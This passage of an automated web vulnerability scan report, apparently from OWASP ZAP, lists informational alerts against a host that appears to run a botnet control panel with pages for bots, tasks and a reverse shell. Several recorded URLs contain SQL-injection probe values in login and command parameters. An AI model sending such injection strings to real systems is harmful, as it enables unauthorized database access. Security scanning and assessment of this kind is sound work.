Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 694 bytes.
Request Body - size: 0 bytes.
Response Header - size: 311 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 767 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter PHPSESSID
Attack
Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 454 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 721 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 664 bytes.
Request Body - size: 0 bytes.
Response Header - size: 364 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter PHPSESSID
Attack
Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 389 bytes.
Response Body - size: 131 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 724 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter PHPSESSID
Attack
Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter PHPSESSID
Attack
Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter PHPSESSID
Attack
Evidence 35kj2pup1e5dd1pbmuuc5b7iuo
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence 35kj2pup1e5dd1pbmuuc5b7iuo
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence ohcrer01tp4qgr8qv9sbq0443d
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 1,061 bytes.
Request Body - size: 138 bytes.
Response Header - size: 253 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter PHPSESSID
Attack
Evidence 5r32rc95v1dvpq7fg42trtf64n
Request Header - size: 855 bytes.
Request Body - size: 138 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter PHPSESSID
Attack
Evidence qfs9pm42g0ntl27inedu6hegm2
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 33
Solution
This is an informational alert rather than a vulnerability and so there is nothing to fix.
Reference https://www.zaproxy.org/docs/desktop/addons/authentication-helper/session-mgmt-id
Tags
CWE Id
WASC Id
Plugin Id 10112
Informational
Storable and Cacheable Content
Description
The response contents are storable by caching components such as proxy servers, and may be retrieved directly from the cache, rather than from the origin server by the caching servers, in response to similar requests from other users. If the response data is sensitive, personal or user-specific, this may result in sensitive information being leaked. In some cases, this may even result in a user gaining complete control of the session of another user, depending on the configuration of the caching components in use in their environment. This is primarily an issue where "shared" caching servers such as "proxy" caches are configured on the local network. This configuration is typically found in corporate or educational environments, for instance.
URL http://142.202.242.172
Method GET
Parameter
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter
Attack
Evidence
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 30
Solution
Validate that the response does not contain sensitive, personal or user-specific information. If it does, consider the use of the following HTTP response headers, to limit, or prevent the content being stored and retrieved from the cache by another user:

Cache-Control: no-cache, no-store, must-revalidate, private

Pragma: no-cache

Expires: 0

This configuration directs both HTTP 1.0 and HTTP 1.1 compliant caching servers to not store the response, and to not retrieve the response (without validation) from the cache, in response to a similar request.
Reference https://datatracker.ietf.org/doc/html/rfc7234
https://datatracker.ietf.org/doc/html/rfc7231
https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
Tags WSTG-v42-ATHN-06
CWE Id 524
WASC Id 13
Plugin Id 10049
Informational
User Agent Fuzzer
Description
Check for differences in response based on fuzzed User Agent (eg. mobile sites, access as a Search Engine Crawler). Compares the response statuscode and the hashcode of the response body with the original response.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 221 bytes.
Request Body - size: 0 bytes.
Response Header - size: 206 bytes.
Response Body - size: 542 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3739.0 Safari/537.36 Edg/75.0.109.0
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/91.0
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter Header User-Agent
Attack msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter Header User-Agent
Attack Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 369 bytes.
Response Body - size: 0 bytes.
